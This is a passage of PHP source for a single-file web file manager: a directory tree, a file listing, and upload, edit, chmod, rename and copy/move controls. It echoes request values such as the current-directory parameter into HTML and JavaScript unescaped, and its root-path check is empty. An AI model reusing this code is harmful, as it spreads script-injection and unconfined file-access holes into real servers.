keypressEvent.keyCode : keypressEvent.which if( kCode == 13) eval(submitFunc); } function getCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return decodeURIComponent(document.cookie.substring(offset, endstr)); } var frameWidth, frameHeight; function getFrameSize(){ if (self.innerWidth){ frameWidth = self.innerWidth; frameHeight = self.innerHeight; }else if (document.documentElement && document.documentElement.clientWidth){ frameWidth = document.documentElement.clientWidth; frameHeight = document.documentElement.clientHeight; }else if (document.body){ frameWidth = document.body.clientWidth; frameHeight = document.body.clientHeight; }else return false; return true; } getFrameSize(); //--> </script> ".$header." </head> <script language=\"Javascript\" type=\"text/javascript\"> <!-- var W = screen.width; var H = screen.height; var FONTSIZE = 0; switch (W){ case 640: FONTSIZE = 8; break; case 800: FONTSIZE = 10; break; case 1024: FONTSIZE = 12; break; default: FONTSIZE = 14; break; } "; echo replace_double(" ",str_replace(chr(13),"",str_replace(chr(10),""," document.writeln(' <style type=\"text/css\"> html { width: 100%; margin-left: 0 !important; } body { font-family : Arial; font-size: '+FONTSIZE+'px; font-weight : normal; color: #".$fm_color['Text']."; background-color: #".$fm_color['Bg']."; } table { font-family : Arial; font-size: '+FONTSIZE+'px; font-weight : normal; color: #".$fm_color['Text']."; cursor: default; } input { font-family : Arial; font-size: '+FONTSIZE+'px; font-weight : normal; color: #".$fm_color['Text']."; } textarea { font-family : Courier; font-size: 12px; font-weight : normal; color: #".$fm_color['Text']."; } a { font-family : Arial; font-size : '+FONTSIZE+'px; font-weight : bold; text-decoration: none; color: #".$fm_color['Text']."; } a:link { color: #".$fm_color['Text']."; } a:visited { color: #".$fm_color['Text']."; } a:hover { color: #".$fm_color['Link']."; } a:active { color: #".$fm_color['Text']."; } tr.entryUnselected { background-color: #".$fm_color['Entry']."; } tr.entryUnselected:hover { background-color: #".$fm_color['Over']."; } tr.entrySelected { background-color: #".$fm_color['Mark']."; } </style> '); "))); echo " //--> </script> "; } function reloadframe($ref,$frame_number,$Plus=""){ global $fm_current_dir,$fm_path_info; echo " <script language=\"Javascript\" type=\"text/javascript\"> <!-- ".$ref.".frame".$frame_number.".location.href='".$fm_path_info["basename"]."?frame=".$frame_number."&fm_current_dir=".$fm_current_dir.$Plus."'; //--> </script> "; } function alert($arg){ echo " <script language=\"Javascript\" type=\"text/javascript\"> <!-- alert('$arg'); //--> </script> "; } define ('UTF32_BIG_ENDIAN_BOM' , chr(0x00).chr(0x00).chr(0xFE).chr(0xFF)); define ('UTF32_LITTLE_ENDIAN_BOM', chr(0xFF).chr(0xFE).chr(0x00).chr(0x00)); define ('UTF16_BIG_ENDIAN_BOM' , chr(0xFE).chr(0xFF)); define ('UTF16_LITTLE_ENDIAN_BOM', chr(0xFF).chr(0xFE)); define ('UTF8_BOM' , chr(0xEF).chr(0xBB).chr(0xBF)); function get_encoding($text){ return mb_detect_encoding($text); } function utf8_convert($str){ if (extension_loaded('mbstring') && extension_loaded('iconv')) { $str_chatset = get_encoding($str); if ($str_chatset == "UTF-8") return $str; return iconv($str_chatset, "UTF-8//TRANSLIT", $str); } else return utf8_encode($str); } function convert_charset($str,$charset){ $str_chatset = get_encoding($str); if ($str_chatset == $charset) return $str; else return iconv($str_chatset, $charset."//TRANSLIT", $str); } function fs_encode($str){ global $is_windows; if ($is_windows) { if (extension_loaded('mbstring') && extension_loaded('iconv')) { $str = convert_charset($str,'ISO-8859-1'); } } return $str; } class fs { protected $base = null; public function __construct($base) { $this->base = $this->real($base); } protected function real($path) { $temp = realpath(fs_encode($path)); if($this->base && strlen($this->base)) { } return $temp; } protected function path($id) { $id = str_replace('/', DIRECTORY_SEPARATOR, $id); $id = trim($id, DIRECTORY_SEPARATOR); $id = $this->real($this->base . DIRECTORY_SEPARATOR . $id); return $id; } protected function id($path) { $path = $this->real($path); $path = substr($path, strlen($this->base)); $path = str_replace(DIRECTORY_SEPARATOR, '/', $path); $path = trim($path, '/'); return strlen($path) ? $path : '/'; } public function lst($id, $with_root = false) { global $is_windows; $dir = $this->path($id); $lst = @scandir($dir); $res = array(); foreach($lst as $item) { if($item == '.' || $item == '..' || $item === null) { continue; } if(is_dir($dir . DIRECTORY_SEPARATOR . $item)) { $res[] = array('text' => utf8_convert($item), 'children' => true, 'id' => utf8_convert($this->id($dir . DIRECTORY_SEPARATOR . $item)), 'icon' => 'folder'); } } if($with_root && $this->id($dir) === '/') { $text = utf8_convert(str_replace("\\","/",$this->base)); $res = array(array('text' => $text, 'children' => $res, 'id' => '/', 'icon'=>'folder', 'state' => array('opened' => true, 'disabled' => false))); } return $res; } public function data($id) { if(strpos($id, ":")) { $id = array_map(array($this, 'id'), explode(':', $id)); return array('type'=>'multiple', 'content'=> 'Multiple selected: ' . implode(' ', $id)); } $dir = $this->path($id); if(is_dir($dir)) { return array('type'=>'folder', 'content'=> $id); } } } function frame2(){ global $fm_current_root,$fm_path_info,$setflag,$is_windows,$cookie_cache_time,$fm_current_dir,$open_basedirs; if(isset($_GET['operation'])) { $fs = new fs($fm_current_root); try { $rslt = null; switch($_GET['operation']) { case 'get_node': $node = isset($_GET['id']) && $_GET['id'] !== '#' ? $_GET['id'] : '/'; $rslt = $fs->lst($node, true); break; default: break; } header('Content-Type: application/json; charset=utf-8'); echo json_encode($rslt); } catch (Exception $e) { header($_SERVER["SERVER_PROTOCOL"] . ' 500 Server Error'); header('Status: 500 Server Error'); echo $e->getMessage(); } die(); } html_header(" <script language=\"Javascript\" type=\"text/javascript\"> <!-- function saveFrameSize(){ if (getFrameSize()){ var exp = new Date(); exp.setTime(exp.getTime()+$cookie_cache_time); setCookie('leftFrameWidth',frameWidth,exp); } } window.onresize = saveFrameSize; //--> </script>"); echo "<body marginwidth=\"0\" marginheight=\"0\"> <script language=\"Javascript\" type=\"text/javascript\"> <!-- // Disable text selection, binding the onmousedown, but not for some elements, it must work. function disableTextSelection(e){ var type = String(e.target.type); return (type.indexOf('select') != -1 || type.indexOf('button') != -1 || type.indexOf('input') != -1 || type.indexOf('radio') != -1); } function enableTextSelection(){return true} if (is.ie) document.onselectstart=new Function('return false') else { document.body.onmousedown=disableTextSelection document.body.onclick=enableTextSelection } var flag = ".(($setflag)?"true":"false")." function set_flag(arg) { flag = arg; } function go_dir(arg) { var setflag; setflag = (flag)?1:0; document.location.href='".addslashes($fm_path_info["basename"])."?frame=2&fm_current_root=".rawurlencode($fm_current_root)."&setflag='+setflag+'&fm_current_dir=".addslashes($fm_current_dir)."&ec_dir='+arg; } function go(arg) { if (flag) { parent.frame3.set_dir_dest(arg+'/'); flag = false; } else { parent.frame3.location.href='".addslashes($fm_path_info["basename"])."?frame=3&fm_current_root=".rawurlencode($fm_current_root)."&fm_current_dir='+arg+'/'; } } function set_fm_current_root(arg){ document.location.href='".addslashes($fm_path_info["basename"])."?frame=2&fm_current_root='+encodeURIComponent(arg); } function refresh_tree(){ document.location.href='".addslashes($fm_path_info["basename"])."?frame=2&fm_current_root=".rawurlencode($fm_current_root)."'; } //--> </script> "; echo "<table width=\"100%\" height=\"100%\" border=0 cellspacing=0 cellpadding=5>\n"; echo "<tr valign=top height=10><td>"; echo "<form style=\"display:inline-block;margin-top:-2px;\" action=\"".$fm_path_info["basename"]."\" method=\"post\" target=\"_parent\">"; $fm_root_opts=array(); if (count($open_basedirs)>1){ foreach ($open_basedirs as $dir) { $is_sel=(strpos($fm_current_root,$dir) !== false)?"selected":""; $fm_root_opts[] = "<option ".$is_sel." value=\"".$dir."\">".($dir)."</option>"; } } elseif ($is_windows){ $drives=array(); $aux="ABCDEFGHIJKLMNOPQRSTUVWXYZ"; for($x=0;$x<strlen($aux);$x++){ $dir = $aux[$x].":/"; if ($handle = @opendir($dir)){ @closedir($handle); $is_sel=(strpos(uppercase($fm_current_root),$dir) !== false)?"selected":""; $fm_root_opts[] = "<option ".$is_sel." value=\"".$dir."\">".($dir)."</option>"; } } } if (count($fm_root_opts)>1) echo "<select name=drive onchange=\"set_fm_current_root(this.value)\" style=\"margin-right:5px;\">".implode("\n",$fm_root_opts)."</select>"; echo "<input type=button value=".et('Refresh')." onclick=\"refresh_tree()\">"; echo "</form>"; echo "</td></tr>"; echo "<tr valign=top><td>"; ?> <script type="text/javascript" src="<?php echo $fm_path_info["basename"]; ?>?action=99&filename=jstree.min.js"></script> <link rel="stylesheet" type="text/css" href="<?php echo $fm_path_info["basename"]; ?>?action=99&filename=jstree.style.min.css" media="screen" /> <div id="container" role="main"> <div id="tree"></div> </div> <script> var tree_loaded = false; var tree_auto_load_nodes = <?php echo json_encode(explode("/",trim(str_replace($fm_current_root,'',$fm_current_dir),'/'))); ?>; var tree_auto_load_node_curr = 0; //console.log(tree_auto_load_nodes); function tree_auto_load(){ if (tree_auto_load_node_curr > tree_auto_load_nodes.length) return; //console.log('tree_auto_load()'); var node_id = tree_auto_load_nodes.slice(0, tree_auto_load_node_curr+1).join("/"); var node = $('#tree').find("[id='"+node_id+"']:eq(0)"); //console.log(node_id); //console.log(node); tree_auto_load_node_curr++; if (tree_auto_load_node_curr == tree_auto_load_nodes.length) { if (node.length) { $("#tree").jstree(true).open_node(node, function(){ $('#tree').jstree(true).select_node(node,true); tree_loaded = true; }, false); } else { tree_loaded = true; } } else { if (node.length) { $("#tree").jstree(true).open_node(node, tree_auto_load, false); } else { tree_auto_load(); } } } $(function () { $('#tree') .jstree({ 'core' : { 'data' : { 'url' : '?frame=2&fm_current_root=<?php echo rawurlencode($fm_current_root) ?>&operation=get_node', 'data' : function (node) { return { 'id' : node.id }; } }, 'check_callback' : function(o, n, p, i, m) { if(m && m.dnd && m.pos !== 'i') { return false; } if(o === "move_node" || o === "copy_node") { if(this.get_node(n).parent === this.get_node(p).id) { return false; } } return true; }, 'force_text' : true, 'themes' : { 'responsive' : false, 'variant' : 'small', 'stripes' : false }, 'expand_selected_onload' : true }, 'sort' : function(a, b) { return this.get_type(a) === this.get_type(b) ? (this.get_text(a) > this.get_text(b) ? 1 : -1) : (this.get_type(a) >= this.get_type(b) ? 1 : -1); }, 'types' : { 'default' : { 'icon' : 'folder' }, 'file' : { 'valid_children' : [], 'icon' : 'file' } }, 'unique' : { 'duplicate' : function (name, counter) { return name + ' ' + counter; } }, 'massload' : { 'url' : '?frame=2&fm_current_root=<?php echo rawurlencode($fm_current_root) ?>&operation=get_node', 'data' : function (nodes) { return { 'ids' : nodes.join(',') }; } }, 'plugins' : ['sort','types','unique'] // 'state', 'massload' }) //.on('changed.jstree', function (e, data) { .on('select_node.jstree', function (e, data) { if (!tree_loaded) return; if (data && data.selected && data.selected.length) { //console.log('select_node.jstree()'); //console.log(data); go('<?php echo rtrim($fm_current_root,'/'); ?>/'+data.selected[0]); } }) .on('loaded.jstree', function (e, data) { //console.log('loaded.jstree()'); //console.log(e); //console.log(data); tree_auto_load(); }); //$('#tree').jstree(true).clear_state(); }); </script> <?php echo "</td></tr>"; echo "</table>\n"; echo "</body>\n</html>"; } function getmicrotime(){ list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function dir_list_form() { global $fm_current_root,$fm_current_dir,$quota_mb,$resolve_ids,$order_dir_list_by,$is_windows,$cmd_name,$ip,$lan_ip,$fm_path_info; $ti = getmicrotime(); clearstatcache(); $out = "<style> #modalDiv { background: #000; opacity: 0.5; width: 100%; height: 100%; position: fixed; top: 0; left: 0; z-index: 30000; display: none; } #modalIframeWrapper { background: #FFF; position: absolute; top: 55%; left: 55%; transform: translate(-60%, -60%); z-index: 32000; display: none; } #modalIframe { background: #FFF; width: 740px; height: 480px; overflow-y: scroll; overflow-x: auto; } </style> <div id=\"modalDiv\"></div> <div id=\"modalIframeWrapper\"> <table border=0 cellspacing=1 cellpadding=4> <tr><td id=\"modalIframeWrapperTitle\" style=\"font-weight:bold;\">Title</td><td align=right width=10><nobr><a style=\"margin-right:2px;\" href=\"JavaScript:closeModalWindow()\">".et('Close')."</a></nobr></td></tr> <tr><td colspan=2><iframe id=\"modalIframe\" src=\"\" scrolling=\"yes\" frameborder=\"0\"></iframe></td></tr> </table> </div> <script language=\"Javascript\" type=\"text/javascript\"> <!-- var modalWindowReloadOnClose = false; function openModalWindow(url,title,w,h,reloadOnClose){ if (typeof(title) == 'undefined') title = ''; if (typeof(w) == 'undefined') w = '640'; if (typeof(h) == 'undefined') h = '480'; if (typeof(reloadOnClose) != 'undefined') modalWindowReloadOnClose = reloadOnClose; document.getElementById(\"modalIframe\").src = url; document.getElementById(\"modalIframe\").style.width = w+'px'; document.getElementById(\"modalIframe\").style.height = h+'px'; document.getElementById(\"modalDiv\").style.display = ('block'); document.getElementById(\"modalIframeWrapper\").style.display = ('block'); document.getElementById(\"modalIframeWrapperTitle\").innerHTML = title; document.getElementById(\"modalIframe\").focus(); } function closeModalWindow(){ document.getElementById(\"modalIframe\").src = ''; document.getElementById(\"modalDiv\").style.display=('none'); document.getElementById(\"modalIframeWrapper\").style.display=('none'); if (modalWindowReloadOnClose) { window.top.frame3.location.href='".$fm_path_info["basename"]."?frame=3&fm_current_dir=".$fm_current_dir."'; } } --> </script> <table border=0 cellspacing=1 cellpadding=4 width=\"100%\" bgcolor=\"#eeeeee\">\n"; if ($opdir = @opendir(fs_encode($fm_current_dir))) { $has_files = false; $entry_count = 0; $total_size = 0; $entry_list = array(); while ($file = readdir($opdir)) { if (($file != ".")&&($file != "..")){ $entry_list[$entry_count]["size"] = 0; $entry_list[$entry_count]["sizet"] = 0; $entry_list[$entry_count]["type"] = "none"; if (is_file($fm_current_dir.$file)){ $ext = lowercase(strrchr($file,".")); $entry_list[$entry_count]["type"] = "file"; // Fun????o filetype() returns only "file"... $entry_list[$entry_count]["size"] = filesize($fm_current_dir.$file); $entry_list[$entry_count]["sizet"] = format_size($entry_list[$entry_count]["size"]); if (strstr($ext,".")){ $entry_list[$entry_count]["ext"] = $ext; $entry_list[$entry_count]["extt"] = $ext; } else { $entry_list[$entry_count]["ext"] = ""; $entry_list[$entry_count]["extt"] = " "; } $has_files = true; } elseif (is_dir($fm_current_dir.$file)) { // Recursive directory size disabled // $entry_list[$entry_count]["size"] = total_size($fm_current_dir.$file); $entry_list[$entry_count]["size"] = 0; $entry_list[$entry_count]["sizet"] = " "; $entry_list[$entry_count]["type"] = "dir"; } $entry_list[$entry_count]["name"] = $file; $entry_list[$entry_count]["date"] = date("Ymd", filemtime($fm_current_dir.$file)); $entry_list[$entry_count]["time"] = date("his", filemtime($fm_current_dir.$file)); $entry_list[$entry_count]["datet"] = date("d/m/y h:i", filemtime($fm_current_dir.$file)); if (!$is_windows && $resolve_ids){ $entry_list[$entry_count]["p"] = show_perms(fileperms($fm_current_dir.$file)); $entry_list[$entry_count]["u"] = get_user(fileowner($fm_current_dir.$file)); $entry_list[$entry_count]["g"] = get_group(filegroup($fm_current_dir.$file)); } else { $entry_list[$entry_count]["p"] = base_convert(fileperms($fm_current_dir.$file),10,8); $entry_list[$entry_count]["p"] = substr($entry_list[$entry_count]["p"],strlen($entry_list[$entry_count]["p"])-3); $entry_list[$entry_count]["u"] = fileowner($fm_current_dir.$file); $entry_list[$entry_count]["g"] = filegroup($fm_current_dir.$file); } $total_size += $entry_list[$entry_count]["size"]; $entry_count++; } } @closedir($opdir); if($entry_count){ $or1="1A"; $or2="2D"; $or3="3A"; $or4="4A"; $or5="5A"; $or6="6D"; $or7="7D"; switch($order_dir_list_by){ case "1A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"name",SORT_STRING,SORT_ASC); $or1="1D"; break; case "1D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"name",SORT_STRING,SORT_DESC); $or1="1A"; break; case "2A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"p",SORT_STRING,SORT_ASC,"g",SORT_STRING,SORT_ASC,"u",SORT_STRING,SORT_ASC); $or2="2D"; break; case "2D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"p",SORT_STRING,SORT_DESC,"g",SORT_STRING,SORT_ASC,"u",SORT_STRING,SORT_ASC); $or2="2A"; break; case "3A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"u",SORT_STRING,SORT_ASC,"g",SORT_STRING,SORT_ASC); $or3="3D"; break; case "3D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"u",SORT_STRING,SORT_DESC,"g",SORT_STRING,SORT_ASC); $or3="3A"; break; case "4A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"g",SORT_STRING,SORT_ASC,"u",SORT_STRING,SORT_DESC); $or4="4D"; break; case "4D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"g",SORT_STRING,SORT_DESC,"u",SORT_STRING,SORT_DESC); $or4="4A"; break; case "5A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"size",SORT_NUMERIC,SORT_ASC); $or5="5D"; break; case "5D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"size",SORT_NUMERIC,SORT_DESC); $or5="5A"; break; case "6A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"date",SORT_STRING,SORT_ASC,"time",SORT_STRING,SORT_ASC,"name",SORT_STRING,SORT_ASC); $or6="6D"; break; case "6D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"date",SORT_STRING,SORT_DESC,"time",SORT_STRING,SORT_DESC,"name",SORT_STRING,SORT_ASC); $or6="6A"; break; case "7A": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"ext",SORT_STRING,SORT_ASC,"name",SORT_STRING,SORT_ASC); $or7="7D"; break; case "7D": $entry_list = array_csort ($entry_list,"type",SORT_STRING,SORT_ASC,"ext",SORT_STRING,SORT_DESC,"name",SORT_STRING,SORT_ASC); $or7="7A"; break; } } $out .= " <script language=\"Javascript\" type=\"text/javascript\"> <!-- function go(arg) { document.location.href='".addslashes($fm_path_info["basename"])."?frame=3&fm_current_dir=".addslashes($fm_current_dir)."'+arg+'/'; } function resolve_ids() { document.location.href='".addslashes($fm_path_info["basename"])."?frame=3&set_resolve_ids=1&fm_current_dir=".addslashes($fm_current_dir)."'; } var entry_list = new Array(); // Custom object constructor function entry(name, type, size, selected){ this.name = name; this.type = type; this.size = size; this.selected = false; } // Declare entry_list for selection procedures"; foreach ($entry_list as $i=>$data){ $out .= "\nentry_list['entry$i'] = new entry('".addslashes($data["name"])."', '".$data["type"]."', ".$data["size"].", false);"; } $out .= " // Select/Unselect Rows OnClick/OnMouseOver var lastRows = new Array(null,null); function selectEntry(Row, Action){ if (multipleSelection){ // Avoid repeated onmouseover events from same Row ( cell transition ) if (Row != lastRows[0]){ if (Action == 'over') { if (entry_list[Row.id].selected){ if (unselect(entry_list[Row.id])) { Row.className = 'entryUnselected'; } // Change the last Row when you change the movement orientation if (lastRows[0] != null && lastRows[1] != null){ var LastRowID = lastRows[0].id; if (Row.id == lastRows[1].id){ if (unselect(entry_list[LastRowID])) { lastRows[0].className = 'entryUnselected'; } } } } else { if (select(entry_list[Row.id])){ Row.className = 'entrySelected'; } // Change the last Row when you change the movement orientation if (lastRows[0] != null && lastRows[1] != null){ var LastRowID = lastRows[0].id; if (Row.id == lastRows[1].id){ if (select(entry_list[LastRowID])) { lastRows[0].className = 'entrySelected'; } } } } lastRows[1] = lastRows[0]; lastRows[0] = Row; } } } else { if (Action == 'click') { var newClassName = null; if (entry_list[Row.id].selected){ if (unselect(entry_list[Row.id])) newClassName = 'entryUnselected'; } else { if (select(entry_list[Row.id])) newClassName = 'entrySelected'; } if (newClassName) { lastRows[0] = lastRows[1] = Row; Row.className = newClassName; } } } return true; } // Disable text selection and bind multiple selection flag var multipleSelection = false; if (is.ie) { document.onselectstart=new Function('return false'); document.onmousedown=switch_flag_on; document.onmouseup=switch_flag_off; // Event mouseup is not generated over scrollbar.. curiously, mousedown is.. go figure. window.onscroll=new Function('multipleSelection=false'); window.onresize=new Function('multipleSelection=false'); } else { if (document.layers) window.captureEvents(Event.MOUSEDOWN); if (document.layers) window.captureEvents(Event.MOUSEUP); window.onmousedown=switch_flag_on; window.onmouseup=switch_flag_off; } // Using same function and a ternary operator couses bug on double click function switch_flag_on(e) { if (is.ie){ multipleSelection = (event.button == 1); } else { multipleSelection = (e.which == 1); } var type = String(e.target.type); return (type.indexOf('select') != -1 || type.indexOf('button') != -1 || type.indexOf('input') != -1 || type.indexOf('radio') != -1); } function switch_flag_off(e) { if (is.ie){ multipleSelection = (event.button != 1); } else { multipleSelection = (e.which != 1); } lastRows[0] = lastRows[1] = null; update_sel_status(); return false; } var total_dirs_selected = 0; var total_files_selected = 0; function unselect(Entry){ if (!Entry.selected) return false; Entry.selected = false; sel_totalsize -= Entry.size; if (Entry.type == 'dir') total_dirs_selected--; else total_files_selected--; return true; } function select(Entry){ if(Entry.selected) return false; Entry.selected = true; sel_totalsize += Entry.size; if(Entry.type == 'dir') total_dirs_selected++; else total_files_selected++; return true; } function is_anything_selected(){ var selected_dir_list = new Array(); var selected_file_list = new Array(); for(var x=0;x<".(integer)count($entry_list).";x++){ if(entry_list['entry'+x].selected){ if(entry_list['entry'+x].type == 'dir') selected_dir_list.push(entry_list['entry'+x].name); else selected_file_list.push(entry_list['entry'+x].name); } } document.form_action.selected_dir_list.value = selected_dir_list.join('<|*|>'); document.form_action.selected_file_list.value = selected_file_list.join('<|*|>'); return (total_dirs_selected>0 || total_files_selected>0); } function format_size (arg) { var resul = ''; if (arg>0){ var j = 0; var ext = new Array(' bytes',' Kb',' Mb',' Gb',' Tb'); while (arg >= Math.pow(1024,j)) ++j; resul = (Math.round(arg/Math.pow(1024,j-1)*100)/100) + ext[j-1]; } else resul = 0; return resul; } var sel_totalsize = 0; function update_sel_status(){ var t = total_dirs_selected+' ".et('Dir_s')." ".et('And')." '+total_files_selected+' ".et('File_s')." ".et('Selected_s')." = '+format_size(sel_totalsize); //document.getElementById(\"sel_status\").innerHTML = t; window.status = t; } // Select all/none/inverse function selectANI(Butt){ cancel_copy_move(); for(var x=0;x<". (integer)count($entry_list).";x++){ var Row = document.getElementById('entry'+x); var newClassName = null; switch (Butt.value){ case '".et('SelAll')."': if (select(entry_list[Row.id])) newClassName = 'entrySelected'; break; case '".et('SelNone')."': if (unselect(entry_list[Row.id])) newClassName = 'entryUnselected'; break; case '".et('SelInverse')."': if (entry_list[Row.id].selected){ if (unselect(entry_list[Row.id])) newClassName = 'entryUnselected'; } else { if (select(entry_list[Row.id])) newClassName = 'entrySelected'; } break; } if (newClassName) { Row.className = newClassName; } } if (Butt.value == '".et('SelAll')."'){ for(var i=0;i<2;i++){ document.getElementById('ANI'+i).value='".et('SelNone')."'; } } else if (Butt.value == '".et('SelNone')."'){ for(var i=0;i<2;i++){ document.getElementById('ANI'+i).value='".et('SelAll')."'; } } update_sel_status(); return true; } function download(arg){ parent.frame1.location.href='".addslashes($fm_path_info["basename"])."?action=3&fm_current_dir=".addslashes($fm_current_dir)."&filename='+encodeURIComponent(arg); } function upload_form(){ openModalWindow('".addslashes($fm_path_info["basename"])."?action=10&fm_current_dir=".addslashes($fm_current_dir)."','".et('Upload')."',800,400,true); } function decompress(arg){ if(confirm('".uppercase(et('Decompress'))." \\' '+arg+' \\' ?')) { document.form_action.action.value = 72; document.form_action.cmd_arg.value = arg; document.form_action.submit(); } } function edit_file_form(arg){ openModalWindow('".addslashes($fm_path_info["basename"])."?action=7&fm_current_dir=".addslashes($fm_current_dir)."&filename='+encodeURIComponent(arg),'".et('Edit')." '+encodeURIComponent(arg),1024,768); } function server_info_form(arg){ openModalWindow('".addslashes($fm_path_info["basename"])."?action=5','".et('ServerInfo')."',800,600); } function view_form(arg){ if(confirm('".uppercase(et('View'))." \\' '+arg+' \\' ?')) openModalWindow('".addslashes($fm_path_info["basename"])."?action=4&fm_current_dir=".addslashes($fm_current_dir)."&filename='+encodeURIComponent(arg),'".et("View")." '+encodeURIComponent(arg),800,600); } function rename(arg){ var nome = ''; if (nome = prompt('".uppercase(et('Rename'))." \\' '+arg+' \\' ".et('To')." ...')) document.location.href='".addslashes($fm_path_info["basename"])."?frame=3&action=3&fm_current_dir=".addslashes($fm_current_dir)."&old_name='+encodeURIComponent(arg)+'&new_name='+encodeURIComponent(nome); } function set_dir_dest(arg){ document.form_action.dir_dest.value=arg; if (document.form_action.action.value.length>0) test(document.form_action.action.value); else alert('".et('JSError').".'); } function sel_dir(arg){ document.form_action.action.value = arg; document.form_action.dir_dest.value=''; if (!is_anything_selected()) alert('".et('NoSel').".'); else { set_sel_dir_warn(true); parent.frame2.set_flag(true); } } function set_sel_dir_warn(b){ try { document.getElementById(\"sel_dir_warn\").style.display=(b?'':'none'); } catch (err) {} } function cancel_copy_move(){ set_sel_dir_warn(false); parent.frame2.set_flag(false); } function chmod_form(){ cancel_copy_move(); document.form_action.dir_dest.value=''; document.form_action.chmod_arg.value=''; if (!is_anything_selected()) alert('".et('NoSel').".'); else openModalWindow('".addslashes($fm_path_info["basename"])."?action=8','".et('Perms')."',280,180); } function set_chmod_arg(arg){ cancel_copy_move(); if (!is_anything_selected()) alert('".et('NoSel').".'); else { document.form_action.dir_dest.value=''; document.form_action.chmod_arg.value=arg; test(9); } } function test_action(){ if (document.form_action.action.value != 0) return true; else return false; } function test_prompt(arg){ cancel_copy_move(); var erro=''; var conf=''; if (arg == 1){ document.form_action.cmd_arg.value = prompt('".et('TypeDir').".'); } else if (arg == 2){ document.form_action.cmd_arg.value = prompt('".et('TypeArq').".'); } else if (arg == 71){ if (!is_anything_selected()) erro = '".et('NoSel').".'; else document.form_action.cmd_arg.value = prompt('".et('TypeArqComp')."'); } if (erro!=''){ document.form_action.cmd_arg.focus(); alert(erro); } else if(document.form_action.cmd_arg.value.length>0) { document.form_action.action.value = arg; document.form_action.submit(); } } function strstr(haystack,needle){ var index = haystack.indexOf(needle); return (index==-1)?false:index; } function valid_dest(dest,orig){ return (strstr(dest,orig)==false)?true:false; } // ArrayAlert - Selection debug only function aa(){ var str = 'selected_dir_list:\\n'; for (x=0;x<selected_dir_list.length;x++){ str += selected_dir_list[x]+'\\n'; } str += '\\nselected_file_list:\\n'; for (x=0;x<selected_file_list.length;x++){ str += selected_file_list[x]+'\\n'; } alert(str); } function test(arg){ cancel_copy_move(); var erro=''; var conf=''; if (arg == 4){ if (!is_anything_selected()) erro = '".et('NoSel').".\\n'; conf = '".et('RemSel')." ?\\n'; } else if (arg == 5){ if (!is_anything_selected()) erro = '".et('NoSel').".\\n'; else if(document.form_action.dir_dest.value.length == 0) erro = '".et('NoDestDir').".'; else if(document.form_action.dir_dest.value == document.form_action.fm_current_dir.value) erro = '".et('DestEqOrig').".'; else if(!valid_dest(document.form_action.dir_dest.value,document.form_action.fm_current_dir.value)) erro = '".et('InvalidDest').".'; conf = '".et('CopyTo')." \\' '+document.form_action.dir_dest.value+' \\' ?\\n'; } else if (arg == 6){ if (!is_anything_selected()) erro = '".et('NoSel').".'; else if(document.form_action.dir_dest.value.length == 0) erro = '".et('NoDestDir').".'; else if(document.form_action.dir_dest.value == document.form_action.fm_current_dir.value) erro = '".et('DestEqOrig').".'; else if(!valid_dest(document.form_action.dir_dest.value,document.form_action.fm_current_dir.value)) erro = '".et('InvalidDest').".'; conf = '".et('MoveTo')." \\' '+document.form_action.dir_dest.value+' \\' ?\\n'; } else if (arg == 9){ if (!is_anything_selected()) erro = '".et('NoSel').".'; else if(document.form_action.chmod_arg.value.length == 0) erro = '".et('NoNewPerm').".'; //conf = '".et('AlterPermTo')." \\' '+document.form_action.chmod_arg.value+' \\' ?\\n'; } if (erro!=''){ document.form_action.cmd_arg.focus(); alert(erro); } else if(conf!='') { if(confirm(conf)) { document.form_action.action.value = arg; document.form_action.submit(); } else { set_sel_dir_warn(false); } } else { document.form_action.action.value = arg; document.form_action.submit(); } } //--> </script>"; $out .= " <tr> <td bgcolor=\"#DDDDDD\" colspan=50><nobr> <form style=\"display:inline-block;\" action=\"".$fm_path_info["basename"]."\" method=\"post\" onsubmit=\"return test_action();\"> <input type=button onclick=\"server_info_form()\" value=\"".et('ServerInfo')."\"> <input type=button onclick=\"test_prompt(1)\" value=\"".et('CreateDir')."\"> <input type=button onclick=\"test_prompt(2)\" value=\"".et('CreateArq')."\"> <input type=button onclick=\"upload_form()\" value=\"".et('Upload')."\"> </form> </nobr> </td> </tr>"; $out .= " <form name=\"form_action\" action=\"".$fm_path_info["basename"]."\" method=\"post\" onsubmit=\"return test_action();\"> <input type=hidden name=\"frame\" value=3> <input type=hidden name=\"action\" value=0> <input type=hidden name=\"dir_dest\" value=\"\"> <input type=hidden name=\"chmod_arg\" value=\"\"> <input type=hidden name=\"cmd_arg\" value=\"\"> <input type=hidden name=\"fm_current_dir\" value=\"$fm_current_dir\"> <input type=hidden name=\"selected_dir_list\" value=\"\"> <input type=hidden name=\"selected_file_list\" value=\"\">"; $uplink = ""; if(isset($_GET['fm_current_dir'])){ $path = $_GET['fm_current_dir']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; $uplink .= '<a href="'.$fm_path_info["basename"].'?frame=3&fm_current_dir=/">/</a>'; continue; } if($pat == '') continue; $uplink .= '<a href="'.$fm_path_info["basename"].'?frame=3&fm_current_dir='; for($i=0;$i<=$id;$i++){ $uplink .= "$paths[$i]"; if($i != $id) $uplink .= "/"; } $uplink .= '">'.$pat.'</a>/'; } if($entry_count){ $out .= " <tr bgcolor=\"#DDDDDD\"><td colspan=50><nobr>$uplink <a target=\"_blank\" 